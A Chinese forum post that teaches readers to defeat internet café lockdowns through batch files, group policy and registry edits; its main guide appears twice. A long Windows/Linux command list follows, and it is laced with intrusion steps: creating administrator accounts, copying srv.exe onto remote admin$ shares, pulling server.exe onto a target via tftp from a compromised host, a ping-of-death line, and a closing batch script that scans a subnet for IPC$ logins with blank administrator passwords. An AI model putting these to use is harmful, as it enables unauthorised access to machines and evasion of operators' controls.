用dos命令破解網吧限制的方法和dos命令全集[color]

用dos命令破解網吧限制的方法和dos命令全集[color]
這是我收集的破解網吧限制的一些方法僅供大家學習參考哈~~
一：就是網吧限制本地硬碟的訪問.

一般情況下這有兩種可能,一種就是簡單的隱藏掉,另外一種是不但隱藏而且還禁止訪問.而根據操作系統的不同,我發現一般98的系統都只是簡單的隱藏,而XP或者2K的系統會做禁止訪問限制.

對簡單的隱藏,要破解很簡單.利用批處理文件來：

新建（或者打開）一個記事本文件,輸入：

start c:

然後另存為bat為後綴的,文件名可以隨便取,但是後綴名一定要為bat.比如123.bat,這樣就是一個簡單的批處理文件了.

雙擊這個bat批處理文件,運行的效果就是打開C盤.這裡簡單解釋一下這個批處理命令start的意義,其實從字面就可以看出,這個命令就相當於「運行」比如你要運行命令提示符,也可以輸入：start command

而這個start其實就是個dos命令,批處理文件其實可以簡單地理解成可以自動運行dos命令的文件,當然批處理的功能並不是只這麼簡單,大家理解就可以了！

如果是XP或者2K的系統,你運行上面的批處理文件提示「本次操作由於這台計算機的限制而被取消.請與您的系統管理員聯繫.」那就是被禁止訪問了,可以從組策略那裡進行更改設置.

同樣,網吧一般不會開運行給你,系統盤又限制了,我們只能再次利用批處理文件來運行打開組策略.

這次輸入：

start gpedit.msc

然後同樣另存為bat文件,gpedit.msc就是組策略.打開組策略,「用戶配置——管理模板——windows組件——windows資源管理器」這個目錄下有個選項「防止從我的電腦訪問驅動器」呵呵,看到了吧,設置成已禁用,就OK了.然後再用start c:就可以打開C盤了.這裡大家肯定會發現組策略裡面有好多相關的限制,比如隱藏驅動器也在那裡,都可以設置,呵呵,這個大家自己發掘這裡暫時不說太多了.

二：文件被隱藏,進了本地硬碟竟然發現一個文件都沒有.

解決的辦法,不同程度的限制就分下面幾種不同的程度解決：
1：最簡單的,就是直接在「文件夾選項——查看——」這裡有個顯示所有文件的選項,點選就可以顯示所有的文件了.

2：98的文件夾選項是在查看菜單下,2K和XP的是在工具菜單下.一般98的文件夾選項會在,而XP的在組策略里可以設置隱藏.對於XP,打開組策略「用戶配置——管理模板——windows組件——windows資源管理器」這個目錄下有個選項「從工具菜單刪除文件夾選項」設置成已禁用,就搞定了.

當然98的系統,也可以把那個文件夾選項弄沒,那我們要使它顯示出來,可以打開註冊表,按常理在HKEY_LOCAL_MACHINESoftwareMicrosoftWindowsCurrentVersionexplorerAdvancedFolder這裡就是文件夾選項的註冊表鍵值了.但如果98要是把這全刪了（我是有遇見過這麼BT的網管……）我們想改也沒法改,就只能導入註冊表文件來搞定

註冊表內容比較多,這裡就不複製過來了,大家直接去下載本帖所帶的附件「文件夾顯示.reg」直接導入就可以了.現在就可以直接設置了.

3：打開文件夾選項后發現沒有「顯示所有文件」這個怎麼辦？不用著急,同樣的道理也是在註冊表限制的,如果你是按照第2步那樣導入了整個註冊表文件,那就不會出現這種情況.

如果是XP的用組策略使文件夾選項顯示出來的,那隻要新建個記事本,輸入下面紅色的字,然後另存為123.reg.

REGEDIT4

[HKEY_LOCAL_MACHINESoftwareMicrosoftWindowsCurrentVersionexplorerAdvancedFolderHiddenSHOWALL]
"RegPath"="Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced"

"Text"="顯示所有文件"
"Type"="radio"
"CheckedValue"=dword:00000001
"ValueName"="Hidden"
"DefaultValue"=dword:00000000
"HKeyRoot"=dword:80000001
"HelpID"="update.hlp#51105"

然後雙擊該文件導入註冊表就可以.

4：上面三種情況都是針對文件夾選項來破限制的,相信應該可以解決大部分的問題了.但是還有其他的辦法,就是使用attrib這個DOS命令解除文件的隱藏屬性,甚至系統屬性都可以解除.不過這個有個缺點就是你得事先知道系統有哪些文件（其實這並不是什麼難關,系統就那麼點文件夾都差不多呵呵）.

具體的操作步驟是這樣的：

先打開命令提示符,我們要習慣把命令提示符當運行菜單來使用.怎麼打開命令提示符？暈,同樣的道理98的系統用「start command」XP的系統用「start cmd」保存成批處理文件運行……這個道理以後就不再說了,舉一反三是最基本的學習能力.

然後在命令提示符里輸入：

attrib 目標文件或文件夾 -h

這個就去掉了該文件或文件夾的隱藏屬性.參數「-」表示去掉,「h」就是隱藏的屬性參數.同樣如果要隱藏某文件可以用「 h」.

attrib這個命令還可以這樣用：

attrib *.* -h

顯示所有的文件,但是記住,這樣並不能顯示所有的文件夾……應該是沒有批量顯示所有文件夾的功能……這個大家多看看網路上基礎的知識就懂了.不說太多了.


三：註冊表被限制.這也有兩種情況.

1.當我們打開regedit時候提示禁止使用註冊表,這個表示雖然打不開註冊表編輯器但是我們還可以用reg文件導入的辦法進行修改編輯註冊表.同樣也可以用導入的辦法解除禁止.具體的方法很簡單,網路上隨便都可以查到,就是寫個reg文件,內容下面紅色字體：

REGEDIT4

[HKEY_CURRENT_USERSoftwareMicrosoftWindowsCurrentVersionPoliciesSystem]
"DisableRegistryTools"=dword:00000000

這樣就可以打開註冊表編輯器了.

2.當想導入註冊表文件時候提示「註冊表被管理員停用,請與系統管理員聯繫」時候,就應該是XP而非98的操作系統了.解除辦法同樣是組策略里
打開組策略「用戶配置——管理模板——系統」這個目錄下有個「阻止訪問註冊表編輯工具」設置成已禁用就搞定了.

四：下載限制.

這個我曾經遇見過搞不定的情況,本來很不想說.一個網吧如果開出來連下載都限制的話,那網管估計是個垃圾白痴了.要換做我絕對不去這樣的網吧上.閑話就不多說了,這裡簡單介紹幾種可能破解下載限制的辦法

1：最簡單的使用在線安裝工具,在線下載之類的.或者QQ網路硬碟下載TT安裝,用TT自帶的下載工具就可以下載.

但是有點麻煩的是QQ網路硬碟被屏蔽了的話就不好辦了,如果對方是修改了QQ的dll文件來達到這種目的的話,那還要你們自己去找找想關的修改資料,我沒弄過.如果只是QQ的系統設置那裡進行隱藏的話那我們可以自己破,打開QQ菜單「個人設置——系統設置——面板設置——系統面板」這裡可以設置相關的面板隱藏或者顯示,不過我估計現在網吧都是修改dll文件來徹底的刪掉網路硬碟的,這招估計不見效！

2：如果在線安裝時候internet選項的設置,導致在線安裝控制項不能運行的話,那就要進internet選項進行設置了.不過網吧一般限制設置internet選項,要破這個限制可以進系統安裝目錄一般的都是c:windowssystem(XP的是system32）inetcpl.cpl的文件,這個文件就是internet選項的設置文件.

如果是萬象的網吧,那這個文件名會被改成inetcpl.cpp,只要把後綴名改成cpl就可以打開了！（到這裡了別再跟我說進系統盤還進不了……-_-bb！）

打開internet選項,這裡其實本身可以做一個下載的限制,就是「安全——internet——自定義級別——下載」這裡可以設置禁止下載和允許下載,如果只是這樣限制的話那就已經可以破下載了.不過一般現在沒這麼簡單了.現在把在線運行控制項的限制解除了吧,同樣在「安全——internet——自定義級別——ActiveX控制項和插件「這裡設置一下啟用就可以了.

而如果這樣還是不行,還是不能解除下載限制的話,可以考慮是否被修改註冊表了.自己去網路上搜索註冊表的鍵,我這裡不能全寫出來,我曾經看過一篇文章,關於下載的鍵不少,複製過來也是浪費篇幅,大家也得學會自己搜索.有時候網吧的限制,手動無法破解也是事實,畢竟人家是用軟體做的這麼多限制的……呵呵！

五：其他一些遇見過的小問題

有的時候你運行gpedit.msc時候會提示找不到文件名找不到該組件,這就是管理員修改了gpedit.msc的文件名了.可以先運行mmc,打開mmc管理器,然後添加系統組件,那裡找到組策略然後添加,就可以了！還有,如果管理員將gpedit.dll也改名甚至刪除,那用MMC也添加不到了~~！！有啥辦法嗎？那就是自己打包gpedit.msc和gpedit.dll放到網路硬碟去……

暫時就想到這些,如果還有什麼補充的或者謬誤的地方歡迎各位添加和糾正`````~~[color]






對簡單的隱藏,要破解很簡單.利用批處理文件來：

新建（或者打開）一個記事本文件,輸入：

start c:

然後另存為bat為後綴的,文件名可以隨便取,但是後綴名一定要為bat.比如123.bat,這樣就是一個簡單的批處理文件了.

雙擊這個bat批處理文件,運行的效果就是打開C盤.這裡簡單解釋一下這個批處理命令start的意義,其實從字面就可以看出,這個命令就相當於「運行」比如你要運行命令提示符,也可以輸入：start command

而這個start其實就是個dos命令,批處理文件其實可以簡單地理解成可以自動運行dos命令的文件,當然批處理的功能並不是只這麼簡單,大家理解就可以了！

如果是XP或者2K的系統,你運行上面的批處理文件提示「本次操作由於這台計算機的限制而被取消.請與您的系統管理員聯繫.」那就是被禁止訪問了,可以從組策略那裡進行更改設置.

同樣,網吧一般不會開運行給你,系統盤又限制了,我們只能再次利用批處理文件來運行打開組策略.

這次輸入：

start gpedit.msc

然後同樣另存為bat文件,gpedit.msc就是組策略.打開組策略,「用戶配置——管理模板——windows組件——windows資源管理器」這個目錄下有個選項「防止從我的電腦訪問驅動器」呵呵,看到了吧,設置成已禁用,就OK了.然後再用start c:就可以打開C盤了.這裡大家肯定會發現組策略裡面有好多相關的限制,比如隱藏驅動器也在那裡,都可以設置,呵呵,這個大家自己發掘這裡暫時不說太多了.


二：文件被隱藏,進了本地硬碟竟然發現一個文件都沒有.

解決的辦法,不同程度的限制就分下面幾種不同的程度解決：

1：最簡單的,就是直接在「文件夾選項——查看——」這裡有個顯示所有文件的選項,點選就可以顯示所有的文件了.

2：98的文件夾選項是在查看菜單下,2K和XP的是在工具菜單下.一般98的文件夾選項會在,而XP的在組策略里可以設置隱藏.對於XP,打開組策略「用戶配置——管理模板——windows組件——windows資源管理器」這個目錄下有個選項「從工具菜單刪除文件夾選項」設置成已禁用,就搞定了.

當然98的系統,也可以把那個文件夾選項弄沒,那我們要使它顯示出來,可以打開註冊表,按常理在HKEY_LOCAL_MACHINESoftwareMicrosoftWindowsCurrentVersionexplorerAdvancedFolder這裡就是文件夾選項的註冊表鍵值了.但如果98要是把這全刪了（我是有遇見過這麼BT的網管……）我們想改也沒法改,就只能導入註冊表文件來搞定

註冊表內容比較多,這裡就不複製過來了,大家直接去下載本帖所帶的附件「文件夾顯示.reg」直接導入就可以了.現在就可以直接設置了.

3：打開文件夾選項后發現沒有「顯示所有文件」這個怎麼辦？不用著急,同樣的道理也是在註冊表限制的,如果你是按照第2步那樣導入了整個註冊表文件,那就不會出現這種情況.

如果是XP的用組策略使文件夾選項顯示出來的,那隻要新建個記事本,輸入下面紅色的字,然後另存為123.reg.

REGEDIT4

[HKEY_LOCAL_MACHINESoftwareMicrosoftWindowsCurrentVersionexplorerAdvancedFolderHiddenSHOWALL]
"RegPath"="Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced"
"Text"="顯示所有文件"
"Type"="radio"
"CheckedValue"=dword:00000001
"ValueName"="Hidden"
"DefaultValue"=dword:00000000
"HKeyRoot"=dword:80000001

"HelpID"="update.hlp#51105"

然後雙擊該文件導入註冊表就可以.

4：上面三種情況都是針對文件夾選項來破限制的,相信應該可以解決大部分的問題了.但是還有其他的辦法,就是使用attrib這個DOS命令解除文件的隱藏屬性,甚至系統屬性都可以解除.不過這個有個缺點就是你得事先知道系統有哪些文件（其實這並不是什麼難關,系統就那麼點文件夾都差不多呵呵）.

具體的操作步驟是這樣的：

先打開命令提示符,我們要習慣把命令提示符當運行菜單來使用.怎麼打開命令提示符？暈,同樣的道理98的系統用「start command」XP的系統用「start cmd」保存成批處理文件運行……這個道理以後就不再說了,舉一反三是最基本的學習能力.

然後在命令提示符里輸入：

attrib 目標文件或文件夾 -h

這個就去掉了該文件或文件夾的隱藏屬性.參數「-」表示去掉,「h」就是隱藏的屬性參數.同樣如果要隱藏某文件可以用「 h」.

attrib這個命令還可以這樣用：

attrib *.* -h

顯示所有的文件,但是記住,這樣並不能顯示所有的文件夾……應該是沒有批量顯示所有文件夾的功能……這個大家多看看網路上基礎的知識就懂了.不說太多了.


三：註冊表被限制.這也有兩種情況.

1.當我們打開regedit時候提示禁止使用註冊表,這個表示雖然打不開註冊表編輯器但是我們還可以用reg文件導入的辦法進行修改編輯註冊表.同樣也可以用導入的辦法解除禁止.具體的方法很簡單,網路上隨便都可以查到,就是寫個reg文件,內容下面紅色字體：


REGEDIT4

[HKEY_CURRENT_USERSoftwareMicrosoftWindowsCurrentVersionPoliciesSystem]

"DisableRegistryTools"=dword:00000000

這樣就可以打開註冊表編輯器了.

2.當想導入註冊表文件時候提示「註冊表被管理員停用,請與系統管理員聯繫」時候,就應該是XP而非98的操作系統了.解除辦法同樣是組策略里
打開組策略「用戶配置——管理模板——系統」這個目錄下有個「阻止訪問註冊表編輯工具」設置成已禁用就搞定了.

四：下載限制.

這個我曾經遇見過搞不定的情況,本來很不想說.一個網吧如果開出來連下載都限制的話,那網管估計是個垃圾白痴了.要換做我絕對不去這樣的網吧上.閑話就不多說了,這裡簡單介紹幾種可能破解下載限制的辦法

1：最簡單的使用在線安裝工具,在線下載之類的.或者QQ網路硬碟下載TT安裝,用TT自帶的下載工具就可以下載.

但是有點麻煩的是QQ網路硬碟被屏蔽了的話就不好辦了,如果對方是修改了QQ的dll文件來達到這種目的的話,那還要你們自己去找找想關的修改資料,我沒弄過.如果只是QQ的系統設置那裡進行隱藏的話那我們可以自己破,打開QQ菜單「個人設置——系統設置——面板設置——系統面板」這裡可以設置相關的面板隱藏或者顯示,不過我估計現在網吧都是修改dll文件來徹底的刪掉網路硬碟的,這招估計不見效！

2：如果在線安裝時候internet選項的設置,導致在線安裝控制項不能運行的話,那就要進internet選項進行設置了.不過網吧一般限制設置internet選項,要破這個限制可以進系統安裝目錄一般的都是c:windowssystem(XP的是system32）inetcpl.cpl的文件,這個文件就是internet選項的設置文件.

如果是萬象的網吧,那這個文件名會被改成inetcpl.cpp,只要把後綴名改成cpl就可以打開了！（到這裡了別再跟我說進系統盤還進不了……-_-bb！）

打開internet選項,這裡其實本身可以做一個下載的限制,就是「安全——internet——自定義級別——下載」這裡可以設置禁止下載和允許下載,如果只是這樣限制的話那就已經可以破下載了.不過一般現在沒這麼簡單了.現在把在線運行控制項的限制解除了吧,同樣在「安全——internet——自定義級別——ActiveX控制項和插件「這裡設置一下啟用就可以了.

而如果這樣還是不行,還是不能解除下載限制的話,可以考慮是否被修改註冊表了.自己去網路上搜索註冊表的鍵,我這裡不能全寫出來,我曾經看過一篇文章,關於下載的鍵不少,複製過來也是浪費篇幅,大家也得學會自己搜索.有時候網吧的限制,手動無法破解也是事實,畢竟人家是用軟體做的這麼多限制的……呵呵！

五：其他一些遇見過的小問題

有的時候你運行gpedit.msc時候會提示找不到文件名找不到該組件,這就是管理員修改了gpedit.msc的文件名了.可以先運行mmc,打開mmc管理器,然後添加系統組件,那裡找到組策略然後添加,就可以了！還有,如果管理員將gpedit.dll也改名甚至刪除,那用MMC也添加不到了~~！！有啥辦法嗎？那就是自己打包gpedit.msc和gpedit.dll放到網路硬碟去……

暫時就想到這些,如果還有什麼補充的或者謬誤的地方歡迎各位添加和糾正`````~~[color]

net use \ipipc$ /del刪除IPC鏈接
net use h: /del刪除映射對方到本地的為H:的映射
net user 用戶名　密碼　/add建立用戶
net user guest /active:yes激活guest用戶
net user查看有哪些用戶
net user 帳戶名查看帳戶的屬性
net localgroup administrators 用戶名 /add把「用戶」添加到管理員中使其具有管理員許可權,注意：administrator后加s用複數
net start查看開啟了哪些服務
net start 服務名　開啟服務；(如:net start telnet, net start schedule)
net stop 服務名停止某服務
net time \目標ip查看對方時間
net time \目標ip /set設置本地計算機時間與「目標IP」主機的時間同步,加上參數/yes可取消確認信息
net view查看本地區域網內開啟了哪些共享
net view \ip查看對方區域網內開啟了哪些共享
net config顯示系統網路設置
net logoff斷開連接的共享
net pause 服務名暫停某服務
net send ip "文本信息"向對方發信息
net ver區域網內正在使用的網路連接類型和信息
net share查看本地開啟的共享
net share ipc$開啟ipc$共享
net share ipc$ /del刪除ipc$共享
net share c$ /del刪除C：共享
net user guest 12345用guest用戶登陸後用將密碼改為12345
net password 密碼更改系統登陸密碼
netstat -a查看開啟了哪些埠,常用netstat -an
netstat -n查看埠的網路連接情況,常用netstat -an
netstat -v查看正在進行的工作
netstat -p 協議名 例：netstat -p tcq/ip查看某協議使用情況（查看tcp/ip協議使用情況）
netstat -s查看正在使用的所有協議使用情況
nbtstat -A ip對方136到139其中一個埠開了的話,就可查看對方最近登陸的用戶名（03前的為用戶名）-注意：參數-A要大寫
tracert -參數 ip(或計算機名)跟蹤路由（數據包）,參數：「-w數字」用於設置超時間隔.

ping ip(或域名)向對方主機發送默認大小為32位元組的數據,參數：「-l[空格]數據包大小」；「-n發送數據次數」；「-t」指一直ping.
ping -t -l 65550 ip死亡之ping(發送大於K的文件並一直ping就成了死亡之ping)
ipconfig (winipcfg)用於windows NT及XP(windows 95 98)查看本地ip地址,ipconfig可用參數「/all」顯示全部配置信息
tlist -t以樹行列表顯示進程(為系統的附加工具,默認是沒有安裝的,在安裝目錄的Support/tools文件夾內)
kill -F 進程名加-F參數后強制結束某進程(為系統的附加工具,默認是沒有安裝的,在安裝目錄的Support/tools文件夾內)
del -F 文件名加-F參數后就可刪除只讀文件,/AR、/AH、/AS、/AA分別表示刪除只讀、隱藏、系統、存檔文件,/A-R、/A-H、/A-S、/A-A表示刪除除只讀、隱藏、系統、存檔以外的文件.例如「DEL/AR *.*」表示刪除當前目錄下所有隻讀文件,「DEL/A-S *.*」表示刪除當前目錄下除系統文件以外的所有文件
del /S /Q 目錄 或用：rmdir /s /Q 目錄/S刪除目錄及目錄下的所有子目錄和文件.同時使用參數/Q 可取消刪除操作時的系統確認就直接刪除.（二個命令作用相同）
move 盤符路徑要移動的文件名　存放移動文件的路徑移動後文件名移動文件,用參數/y將取消確認移動目錄存在相同文件的提示就直接覆蓋
fc one.txt two.txt > 3st.txt對比二個文件並把不同之處輸出到3st.txt文件中,"> "和"> >" 是重定向命令
at id號開啟已註冊的某個計劃任務
at /delete停止所有計劃任務,用參數/yes則不需要確認就直接停止
at id號 /delete停止某個已註冊的計劃任務
at查看所有的計劃任務
at \ip time 程序名(或一個命令) /r在某時間運行對方某程序並重新啟動計算機
finger username @host查看最近有哪些用戶登陸

telnet ip 埠遠和登陸伺服器,默認埠為23
open ip連接到IP（屬telnet登陸后的命令）
telnet在本機上直接鍵入telnet 將進入本機的telnet
copy 路徑文件名1　路徑文件名2 /y複製文件1到指定的目錄為文件2,用參數/y就同時取消確認你要改寫一份現存目錄文件
copy c:srv.exe \ipadmin$複製本地c:srv.exe到對方的admin下
cppy 1st.jpg/b 2st.txt/a 3st.jpg將2st.txt的內容藏身到1st.jpg中生成3st.jpg新的文件,註：2st.txt文件頭要空三排,參數：/b指二進位文件,/a指ASCLL格式文件
copy \ipadmin$svv.exe c: 或:copy\ipadmin$*.*複製對方admini$共享下的srv.exe文件（所有文件）至本地C：
xcopy 要複製的文件或目錄樹　目標地址目錄名複製文件和目錄樹,用參數/Y將不提示覆蓋相同文件
tftp -i 自己IP(用肉機作跳板時這用肉機IP) get server.exe c:server.exe 登陸后,將「IP」的server.exe下載到目標主機c:server.exe 參數：-i指以二進位模式傳送,如傳送exe文件時用,如不加-i 則以ASCII模式（傳送文本文件模式）進行傳送
tftp -i 對方IP　put c:server.exe登陸后,上傳本地c:server.exe至主機
ftp ip 埠用於上傳文件至伺服器或進行文件操作,默認埠為21.bin指用二進位方式傳送（可執行文件進）；默認為ASCII格式傳送(文本文件時)
route print顯示出IP路由,將主要顯示網路地址Network addres,子網掩碼Netmask,網關地址Gateway addres,介面地址Interface
arp查看和處理ARP緩存,ARP是名字解析的意思,負責把一個IP解析成一個物理性的MAC地址.arp -a將顯示出全部信息
start 程序名或命令 /max 或/min新開一個新窗口並最大化（最小化）運行某程序或命令
mem查看cpu使用情況
attrib 文件名(目錄名)查看某文件（目錄）的屬性

attrib 文件名 -A -R -S -H 或 A R S H去掉(添加)某文件的 存檔,只讀,系統,隱藏 屬性；用＋則是添加為某屬性
dir查看文件,參數：/Q顯示文件及目錄屬系統哪個用戶,/T:C顯示文件創建時間,/T:A顯示文件上次被訪問時間,/T:W上次被修改時間
date /t 、 time /t 使用此參數即「DATE/T」、「TIME/T」將只顯示當前日期和時間,而不必輸入新日期和時間
set 指定環境變數名稱=要指派給變數的字元設置環境變數
set顯示當前所有的環境變數
set p(或其它字元)顯示出當前以字元p(或其它字元)開頭的所有環境變數
pause暫停批處理程序,並顯示出：請按任意鍵繼續....
if在批處理程序中執行條件處理（更多說明見if命令及變數）
goto 標籤將cmd.exe導向到批處理程序中帶標籤的行（標籤必須單獨一行,且以冒號打頭,例如：「：start」標籤）
call 路徑批處理文件名從批處理程序中調用另一個批處理程序 （更多說明見call /?）
for對一組文件中的每一個文件執行某個特定命令（更多說明見for命令及變數）
echo on或off打開或關閉echo,僅用echo不加參數則顯示當前echo設置
echo 信息在屏幕上顯示出信息
echo 信息 >> pass.txt將"信息"保存到pass.txt文件中
findstr "Hello" aa.txt在aa.txt文件中尋找字元串hello
find 文件名查找某文件
title 標題名字更改CMD窗口標題名字
color 顏色值設置cmd控制台前景和背景顏色；0＝黑、1＝藍、2＝綠、3＝淺綠、4＝紅、5＝紫、6＝黃、7=白、8=灰、9=淡藍、A＝淡綠、B=淡淺綠、C=淡紅、D=淡紫、E=淡黃、F=亮白
prompt 名稱更改cmd.exe的顯示的命令提示符(把C:、D:統一改為：EntSky )
print 文件名列印文本文件
2ver在DOS窗口下顯示版本信息
winver彈出一個窗口顯示版本信息（內存大小、系統版本、補丁版本、計算機名）

format 盤符 /FS:類型格式化磁碟,類型:FAT、FAT32、NTFS ,例：Format D: /FS:NTFS
md　目錄名創建目錄
replace 源文件　要替換文件的目錄替換文件
ren 原文件名　新文件名重命名文件名
tree以樹形結構顯示出目錄,用參數-f 將列出第個文件夾中文件名稱
type 文件名顯示文本文件的內容
more 文件名 逐屏顯示輸出文件
doskey 要鎖定的命令＝字元
doskey 要解鎖命令= 為DOS提供的鎖定命令(編輯命令行,重新調用win2k命令,並創建宏).如：鎖定dir命令：doskey dir=entsky (不能用doskey dir=dir)；解鎖：doskey dir=
taskmgr 調出任務管理器
chkdsk /F D: 檢查磁碟D並顯示狀態報告；加參數/f並修復磁碟上的錯誤
tlntadmn telnt服務admn,鍵入tlntadmn選擇3,再選擇8,就可以更改telnet服務默認埠23為其它任何埠
exit退出cmd.exe程序或目前,用參數/B則是退出當前批處理腳本而不是cmd.exe
path 路徑可執行文件的文件名 為可執行文件設置一個路徑.
cmd 啟動一個win2K命令解釋窗口.參數：/eff、/en 關閉、開啟命令擴展；更我詳細說明見cmd /?
regedit /s 註冊表文件名導入註冊表；參數/S指安靜模式導入,無任何提示；
regedit /e 註冊表文件名 導出註冊表
cacls 文件名　參數 顯示或修改文件訪問控制列表（ACL）——針對NTFS格式時.參數：/D 用戶名:設定拒絕某用戶訪問；/P 用戶名:perm 替換指定用戶的訪問許可權；/G 用戶名:perm 賦予指定用戶訪問許可權；Perm 可以是: N 無,R 讀取, W 寫入, C 更改(寫入),F 完全控制；例：cacls D:test.txt /D pub 設定d:test.txt拒絕pub用戶訪問.
cacls 文件名查看文件的訪問用戶許可權列表
REM 文本內容在批處理文件中添加註解
netsh查看或更改本地網路配置情況

IIS服務命令：
iisreset /reboot重啟win2k計算機（但有提示系統將重啟信息出現）
iisreset /start或stop啟動（停止）所有Internet服務
iisreset /restart停止然後重新啟動所有Internet服務
iisreset /status顯示所有Internet服務狀態
iisreset /enable或disable在本地系統上啟用（禁用）Internet服務的重新啟動
iisreset /rebootonerror當啟動、停止或重新啟動Internet服務時,若發生錯誤將重新開機
iisreset /noforce若無法停止Internet服務,將不會強制終止Internet服務
iisreset /timeoutVal在到達逾時間（秒）時,仍未停止Internet服務,若指定/rebootonerror參數,則電腦將會重新開機.預設值為重新啟動20秒,停止60秒,重新開機0秒.
FTP 命令： (後面有詳細說明內容)
ftp的命令行格式為:
ftp －v －d －i －n －g[主機名] －v 顯示遠程伺服器的所有響應信息.
－d 使用調試方式.
－n 限制ftp的自動登錄,即不使用.netrc文件.
－g 取消全局文件名.
help [命令] 或 ？[命令] 查看命令說明
bye 或 quit 終止主機FTP進程,並退出FTP管理方式.
pwd 列出當前遠端主機目錄
put 或 send 本地文件名 [上傳到主機上的文件名] 將本地一個文件傳送至遠端主機中
get 或 recv [遠程主機文件名] [下載到本地后的文件名] 從遠端主機中傳送至本地主機中
mget [remote-files]從遠端主機接收一批文件至本地主機
mput local-files 將本地主機中一批文件傳送至遠端主機
dir 或 ls [remote-directory] [local-file]列出當前遠端主機目錄中的文件.如果有本地文件,就將結果寫至本地文件
ascii 設定以ASCII方式傳送文件(預設值)
bin 或 image 設定以二進位方式傳送文件
bell 每完成一次文件傳送,報警提示
cdup 返回上一級目錄

close 中斷與遠程伺服器的ftp會話(與open對應)
open host[port] 建立指定ftp伺服器連接,可指定連接埠
delete 刪除遠端主機中的文件
mdelete [remote-files] 刪除一批文件
mkdir directory-name 在遠端主機中建立目錄
rename [from] [to] 改變遠端主機中的文件名
rmdir directory-name 刪除遠端主機中的目錄
status 顯示當前FTP的狀態
system 顯示遠端主機系統類型
user user-name [password] [account] 重新以別的用戶名登錄遠端主機
open host [port] 重新建立一個新的連接
prompt 交互提示模式
macdef 定義宏命令
lcd 改變當前本地主機的工作目錄,如果預設,就轉到當前用戶的HOME目錄
chmod 改變遠端主機的文件許可權
case 當為ON時,用MGET命令拷貝的文件名到本地機器中,全部轉換為小寫字母
cd remote－dir 進入遠程主機目錄
cdup 進入遠程主機目錄的父目錄
! 在本地機中執行交互shell,exit回到ftp環境,如!ls＊.zip


MYSQL 命令：
mysql -h主機地址 -u用戶名 －p密碼 連接MYSQL;如果剛安裝好MYSQL,超級用戶root是沒有密碼的.
（例：mysql -h110.110.110.110 -Uroot -P123456
注:u與root可以不用加空格,其它也一樣）
exit 退出MYSQL
mysqladmin -u用戶名 -p舊密碼 password 新密碼 修改密碼
grant select on 資料庫.* to 用戶名@登錄主機 identified by "密碼"; 增加新用戶.（注意：和上面不同,下面的是MYSQL環境中的命令,後面都帶一個分號作為命令結束符）
show databases;顯示資料庫列表.剛開始時才兩個資料庫：mysql和test.mysql庫很重要它裡面有MYSQL的系統信息,我們改密碼和新增用戶,實際上就是用這個庫進行操作.

create database 庫名;建庫
use 庫名；
create table 表名 (欄位設定列表)； 建表
drop database 庫名;
drop table 表名； 刪庫和刪表
delete from 表名;將表中記錄清空
select * from 表名; 顯示錶中的記錄
mysqldump --opt school>school.bbb備份資料庫：（命令在DOS的\mysql\bin目錄下執行）;註釋:將資料庫school備份到school.bbb文件,school.bbb是一個文本文件,文件名任取,打開看看你會有新發現.
win2003系統下新增命令（實用部份）：
shutdown /參數關閉或重啟本地或遠程主機.
參數說明：/S 關閉主機,/R 重啟主機, /T 數字 設定延時的時間,範圍0～180秒之間, /A取消開機,/M //IP 指定的遠程主機.
例：shutdown /r /t 0 立即重啟本地主機（無延時）
taskill /參數 進程名或進程的pid 終止一個或多個任務和進程.
參數說明：/PID 要終止進程的pid,可用tasklist命令獲得各進程的pid,/IM 要終止的進程的進程名,/F 強制終止進程,/T 終止指定的進程及他所啟動的子進程.
tasklist顯示當前運行在本地和遠程主機上的進程、服務、服務各進程的進程標識符(PID).
參數說明：/M 列出當前進程載入的dll文件,/SVC 顯示出每個進程對應的服務,無參數時就只列出當前的進程.

Linux系統下基本命令： 要區分大小寫
uname顯示版本信息（同win2K的 ver）
dir顯示當前目錄文件,ls -al 顯示包括隱藏文件（同win2K的 dir）
pwd查詢當前所在的目錄位置
cdcd　..回到上一層目錄,注意cd 與..之間有空格.cd　/返回到根目錄.
cat 文件名查看文件內容
cat >abc.txt往abc.txt文件中寫上內容.
more 文件名以一頁一頁的方式顯示一個文本文件.
cp複製文件
mv移動文件
rm 文件名刪除文件,rm -a 目錄名刪除目錄及子目錄

mkdir 目錄名建立目錄
rmdir刪除子目錄,目錄內沒有文檔.
chmod 設定檔案或目錄的存取許可權
grep 在檔案中查找字元串
diff 檔案文件比較
find 檔案搜尋
date現在的日期、時間
who查詢目前和你使用同一台機器的人以及Login時間地點
w 查詢目前上機者的詳細資料
whoami查看自己的帳號名稱
groups 查看某人的Group
passwd 更改密碼
history 查看自己下過的命令
ps 顯示進程狀態
kill 停止某進程
gcc 黑客通常用它來編譯C語言寫的文件
su許可權轉換為指定使用者
telnet IPtelnet連接對方主機（同win2K）,當出現bash$時就說明連接成功.
ftp ftp連接上某伺服器（同win2K）
3附：批處理命令與變數

1：for命令及變數 基本格式：
FOR /參數 %variable IN (set) DO command [command_parameters]%variable:指定一個單一字母可替換的參數,如：%i ,而指定一個變數則用：%%i ,而調用變數時用：%i% ,變數是區分大小寫的（%i 不等於 %I）.
批處理每次能處理的變數從%0—%9共10個,其中%0默認給批處理文件名使用,%1默認為使用此批處理時輸入的的第一個值,同理：%2—%9指輸入的第2-9個值；例：net use \ipipc$ pass /user:user 中ip為%1,pass為%2 ,user為%3

(set):指定一個或一組文件,可使用通配符,如：(D:user.txt)和(1 1 254)(1 -1 254),{「(1 1 254)」第一個"1"指起始值,第二個"1"指增長量,第三個"254"指結束值,即：從1到254；「(1 -1 254)」說明：即從254到1}

command：指定對第個文件執行的命令,如：net use命令；如要執行多個命令時,命令這間加：& 來隔開
command_parameters：為特定命令指定參數或命令行開關

IN (set)：指在(set)中取值；DO command ：指執行command

參數：/L 指用增量形式{(set)為增量形式時}；/F 指從文件中不斷取值,直到取完為止{(set)為文件時,如(d:pass.txt)時}.
用法舉例：
@echo off
echo 用法格式：test.bat *.*.* > test.txt

for /L %%G in (1 1 254) do echo %1.%%G >>test.txt & net use \%1.%%G /user:administrator | find "命令成功完成" >>test.txt
存為test.bat 說明：對指定的一個C類網段的254個IP依次試建立administrator密碼為空的IPC$連接,如果成功就把該IP存在test.txt中.

/L指用增量形式（即從1-254或254-1）；輸入的IP前面三位：*.*.*為批處理默認的 %1；%%G 為變數(ip的一位）；& 用來隔開echo 和net use 這二個命令；| 指建立了ipc$后,在結果中用find查看是否有"命令成功完成"信息；%1.%%G 為完整的IP地址；(1 1 254) 指起始值,增長量,結止值.
@echo off
